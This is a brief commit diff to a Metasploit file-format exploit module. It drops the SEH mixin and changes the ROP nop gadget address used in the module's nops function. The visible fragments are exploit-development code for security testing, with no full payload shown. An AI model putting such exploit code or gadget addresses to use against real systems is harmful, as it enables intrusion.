remove seh mixin and fix the rop nop address
parent
23d2bfc915
commit
ecb2667401
|
@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -73,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def nops(rop=false, n=1)
|
||||
return rop ? [0x6ab21799] * n : [0x90909090] * n
|
||||
return rop ? [0x6ab16202] * n : [0x90909090] * n
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
Loading…
Reference in New Issue